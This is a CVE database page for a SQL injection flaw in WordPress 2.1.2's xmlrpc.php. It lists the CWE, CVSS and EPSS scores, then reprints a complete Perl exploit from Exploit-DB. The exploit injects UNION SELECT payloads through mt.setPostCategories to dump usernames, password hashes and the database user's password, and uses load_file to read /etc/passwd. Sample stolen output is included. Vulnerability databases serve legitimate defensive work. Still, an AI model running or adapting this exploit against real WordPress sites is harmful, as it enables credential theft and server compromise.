CVE-2007-1897

CVE Descriptions

SQL injection vulnerability in xmlrpc (xmlrpc.php) in WordPress 2.1.2, and probably earlier, allows remote authenticated users to execute arbitrary SQL commands via a string parameter value in an XML RPC mt.setPostCategories method call, related to the post_id variable.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	6.5		AV:N/AC:L/Au:S/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	2.8%	–	–
2022-03-13	–	–	2.8%	–	–
2022-04-03	–	–	2.8%	–	–
2022-04-17	–	–	2.8%	–	–
2022-10-16	–	–	2.8%	–	–
2023-01-01	–	–	2.8%	–	–
2023-01-08	–	–	2.8%	–	–
2023-03-12	–	–	–	0.46%	–
2023-04-02	–	–	–	0.46%	–
2023-05-28	–	–	–	1.3%	–
2024-01-07	–	–	–	2.11%	–
2024-02-11	–	–	–	2.11%	–
2024-06-02	–	–	–	2.1%	–
2024-06-09	–	–	–	1.49%	–
2024-07-14	–	–	–	1.31%	–
2024-12-15	–	–	–	1.31%	–
2024-12-22	–	–	–	0.93%	–
2025-01-19	–	–	–	0.93%	–
2025-03-18	–	–	–	–	2.33%
2025-03-30	–	–	–	–	2.33%
2025-04-10	–	–	–	–	2.33%
2025-04-12	–	–	–	–	2.33%
2025-04-13	–	–	–	–	2.33%
2025-04-14	–	–	–	–	2.33%
2025-04-15	–	–	–	–	2.33%
2025-04-15	–	–	–	–	2.33,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	64%
2022-03-13	65%
2022-04-03	81%
2022-04-17	82%
2022-10-16	83%
2023-01-01	82%
2023-01-08	83%
2023-03-12	71%
2023-04-02	72%
2023-05-28	84%
2024-01-07	88%
2024-02-11	89%
2024-06-02	89%
2024-06-09	87%
2024-07-14	86%
2024-12-15	87%
2024-12-22	83%
2025-01-19	83%
2025-03-18	84%
2025-03-30	83%
2025-04-10	84%
2025-04-12	83%
2025-04-13	84%
2025-04-14	83%
2025-04-15	84%
2025-04-15	84%

Exploit information

Exploit Database EDB-ID : 3656

Publication date : 2007-04-02 22h00 +00:00
Author : Sumit Siddharth
EDB Verified : Yes

#!/usr/bin/perl -w #Wordpress 2.1.2 SQL Injection POC #Credits: sid@notsosecure.com #Thanks to ferruh (ferruh@mavituna.com)for improving my exploitation skills #website:www.notsosecure.com #Wordpress version 2.1.2 is vulnerable to sql injection. This POC works when exploting with the credentials of a valid user. The user can belong to 'contributor' role or any higher role. Versions before 2.1.2 have not been tested but are most likely to be vulnerable as well. #Example:--------------------------------------------------------------------------------------- #C:\wp-xmlrpc-2-2-sql.pl" http://192.168.2.4/apache2-default/wordpress/ author author 5 # # The usage is correct #[*] Trying Host http://192.168.2.4/apache2-default/wordpress/ ... #[+] The xmlrpc-2-2 server seems to be working #-------------------- #Username for id = 1 is:--> admin # #Md5 hash for user: admin # #is: 21232f297a57a5a743894a0e4a801fc3 # #-------------------- #Username for id = 2 is:--> contri # #Md5 hash for user: contri # #is: 95a178dde9d3fa2bde4971f10d3acc3e # #-------------------- #Username for id = 3 is:--> author # #Md5 hash for user: author # #is: 02bd92faa38aaa6cc0ea75e59937a1ef # #----------------------- #Total Number of Users found:-->3 #----------------------- #Mysql is running as: root@localhost # #Encrypted password for: root@localhost # is: root@localhost67457e226a1a15bd # #This deserves no mercy.... Lets get the /etc/passwd #.......imho...Here is the /etc/passwd file: #root:x:0:0:root:/root:/bin/bash #daemon:x:1:1:daemon:/usr/sbin:/bin/sh #bin:x:2:2:bin:/bin:/bin/sh #sys:x:3:3:sys:/dev:/bin/sh #sync:x:4:65534:sync:/bin:/bin/sync #games:x:5:60:games:/usr/games:/bin/sh #man:x:6:12:man:/var/cache/man:/bin/sh #lp:x:7:7:lp:/var/spool/lpd:/bin/sh #mail:x:8:8:mail:/var/mail:/bin/sh #news:x:9:9:news:/var/spool/news:/bin/sh #uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh #proxy:x:13:13:proxy:/bin:/bin/sh #www-data:x:33:33:www-data:/var/www:/bin/sh #backup:x:34:34:backup:/var/backups:/bin/sh #list:x:38:38:Mailing List Manager:/var/list:/bin/sh #gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh #messagebus:x:100:103::/var/run/dbus:/bin/false #postgres:x:101:105:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash #haldaemon:x:103:109:Hardware abstraction layer,,,:/home/haldaemon:/bin/false #gdm:x:104:112:Gnome Display Manager:/var/lib/gdm:/bin/false #mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false #sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin #snort:x:107:115:Snort IDS:/var/log/snort:/bin/false #postfix:x:108:116::/var/spool/postfix:/bin/false #stunnel4:x:109:118::/var/run/stunnel4:/bin/false #arpwatch:x:111:120:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh #statd:x:112:65534::/var/lib/nfs:/bin/false #sfs:x:113:121::/var/lib/sfs:/bin/false #ftp:x:114:65534::/home/ftp:/bin/false #Debian-exim:x:115:122::/var/spool/exim4:/bin/false #telnetd:x:116:123::/nonexistent:/bin/false #------------------------------------------------------------------------------------------------------- #use warnings; use LWP::UserAgent; my $ua = new LWP::UserAgent; $ua->agent("Wordpress Hash Grabber v2.0" . $ua->agent); my $host = $ARGV[0]; # The path to xmlrpc.php my $username= $ARGV[1];#username <any role> my $password= $ARGV[2];#password <any role> my $postid= $ARGV[3];#post id which the user can edit my $pref = 'wp_'; # database prefix! my $hash_pass=""; #$root='root@localhost.com'; if (@ARGV < 4) { print " -----------------------------------------------------------------------\n"; print " wp-xmlrpc-sql.pl - Wordpress xmlrpc.php 'post_id' sql injection exploit\n Version 2.1.2"; print " by NotSoSecure // www.notsosecure.com \n"; print " coded by sid //sid\@notsosecure.com // 31.03.2007\n"; print " ------------------------------------------------------------------------\n"; print " Usage:\n"; print " wp-xmlrpc-sql.pl <host> <username> <password> <post_id>\n"; print "\n"; print " <host> - host for attack\n full path eg. http://192.168.1.4/wordpress/"; print " <username> - valid username, can be in any of these role: contributor, author, editor \n"; print " <password> - valid password for the user\n"; print " <post_id> - valid post_id which the user can edit\n"; print " ------------------------------------------------------------------------\n"; exit(); } print "\n The usage is correct\n[*] Trying Host $host ...\n"; my $res = $ua->get($host.'/xmlrpc.php'); if ( $res->content =~ /XML-RPC server accepts POST requests only/is ) { print "[+] The xmlrpc server seems to be working \n"; } else { print "--------------------\n"; print "[error]--> Something seems to be wrong with the xmlrpc.php \nCheck the full path to xmlrpc.php again\n "; # Sloppy way of debugging, remove if you want open(LOG, ">wp_out.html"); print LOG $res->content; exit; } for ($i=1; $i<=100 ;$i++) { #bug: if a user has been deleted the corresponding id will be missing. #change this to point to the known ids or the usernames, or just make it go for top 100 ids #obtaining usernames and userid my $sql = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName> <params> <param><value><string>".$postid." union all select user_login from wp_users where id=".$i."</string></value> </param> <param><value><string>".$username."</string></value> </param> <param><value><string>".$password."</string></value> </param> <param><value> <array> <data><value> <struct> <member> <name>categoryId</name> <value><string>1</string></value> </member> <member> <name>categoryName</name> <value><string>Uncategorized</string></value> </member> <member> <name>isPrimary</name> <value><boolean>0</boolean></value> </member> </struct></value> </data></array></value> </param> </params></methodCall>"; my $req = new HTTP::Request POST => $host . "/xmlrpc.php"; $req->content($sql); $res = $ua->request($req); $out = $res->content; if($out=~ /Bad login\/pass combination/) { print "--------------------\n"; print "[error]-->Invalid username/password conbination\n"; exit; } if($out=~ /Sorry, you can not edit this post/) { print "--------------------\n"; print "[error]-->INVALID postid \n Supply a post id which can be edited by this user.\n"; exit; } if ($out =~ /DELETE FROM wp_post2cat/) { #print "found"; print "--------------------\n"; @result2=split(/category_id =/,$out); #to do: remove the assumption that username is less than 10 char $final=substr($result2[1],1,10); print "Username for id = ".$i." is:--> ".$final."\n"; no warnings; #obtaining md5 hash for the username my $sql2 = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName> <params> <param><value><string>".$postid." union all select user_pass from wp_users where id=".$i."</string></value> </param> <param><value><string>".$username."</string></value> </param> <param><value><string>".$password."</string></value> </param> <param><value> <array> <data><value> <struct> <member> <name>categoryId</name> <value><string>1</string></value> </member> <member> <name>categoryName</name> <value><string>Uncategorized</string></value> </member> <member> <name>isPrimary</name> <value><boolean>0</boolean></value> </member> </struct></value> </data></array></value> </param> </params></methodCall>"; my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req2->content($sql2); $res2 = $ua->request($req2); $out2 = $res2->content; @result3=split(/category_id =/,$out2); $hash=substr($result3[1],1,33); print "Md5 hash for user: ".$final." \nis: ".$hash."\n"; } else { print "-----------------------\n"; print "Total Number of Users found:-->".($i-1)."\n"; print "-----------------------\n"; #lets find wat the db is running as: my $sql2 = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName> <params> <param><value><string>".$postid." union all select user()</string></value> </param> <param><value><string>".$username."</string></value> </param> <param><value><string>".$password."</string></value> </param> <param><value> <array> <data><value> <struct> <member> <name>categoryId</name> <value><string>1</string></value> </member> <member> <name>categoryName</name> <value><string>Uncategorized</string></value> </member> <member> <name>isPrimary</name> <value><boolean>0</boolean></value> </member> </struct></value> </data></array></value> </param> </params></methodCall>"; my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req2->content($sql2); $res2 = $ua->request($req2); $out2 = $res2->content; @result3=split(/category_id =/,$out2); $hash_user=substr($result3[1],1,20); print "Mysql is running as: ".$hash_user."\n"; #lets get the password hash of the db_user for offline cracking #buggy code my $sql3 = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName> <params> <param><value><string>".$postid." union all select concat(user(),mysql.user.Password) from mysql.user where user=user()</string></value> </param> <param><value><string>".$username."</string></value> </param> <param><value><string>".$password."</string></value> </param> <param><value> <array> <data><value> <struct> <member> <name>categoryId</name> <value><string>1</string></value> </member> <member> <name>categoryName</name> <value><string>Uncategorized</string></value> </member> <member> <name>isPrimary</name> <value><boolean>0</boolean></value> </member> </struct></value> </data></array></value> </param> </params></methodCall>"; my $req3 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req3->content($sql3); $res3 = $ua->request($req3); $out3 = $res3->content; my $hash_pass=""; #print $out3; if ($out3=~m/SELECT command denied to user/) { print "Cant get the password for this user, \nPermission Denied, Thats better security!!"; exit;} else{ @result3=split(/category_id =/,$out3); $hash_pass=substr($result3[1],1,30); print $hash_pass; if ($hash_pass eq "") { print "No Password set"; } else{ print "Encrypted password for: ".$hash_user."\n is ".$hash_pass."\n"; } #IF database is running as root, lets rip it apart if ($hash_user =~m/root/) { print"\nThis deserves no mercy....\n Lets get the /etc/passwd\n.......imho...\n\n"; my $sql4 = "<?xml version=\"1.0\"?><methodCall><methodName>mt.setPostCategories</methodName> <params> <param><value><string>".$postid." union all select load_file(0x2f6574632f706173737764)</string></value> </param> <param><value><string>".$username."</string></value> </param> <param><value><string>".$password."</string></value> </param> <param><value> <array> <data><value> <struct> <member> <name>categoryId</name> <value><string>1</string></value> </member> <member> <name>categoryName</name> <value><string>Uncategorized</string></value> </member> <member> <name>isPrimary</name> <value><boolean>0</boolean></value> </member> </struct></value> </data></array></value> </param> </params></methodCall>"; my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req2->content($sql4); $res2 = $ua->request($req2); $out2 = $res2->content; @result3=split(/category_id =/,$out2); $hash=substr($result3[1],1,1600); print "Here is the /etc/passwd file:\n\n\n"; print $hash; } exit; } } } # milw0rm.com [2007-04-03]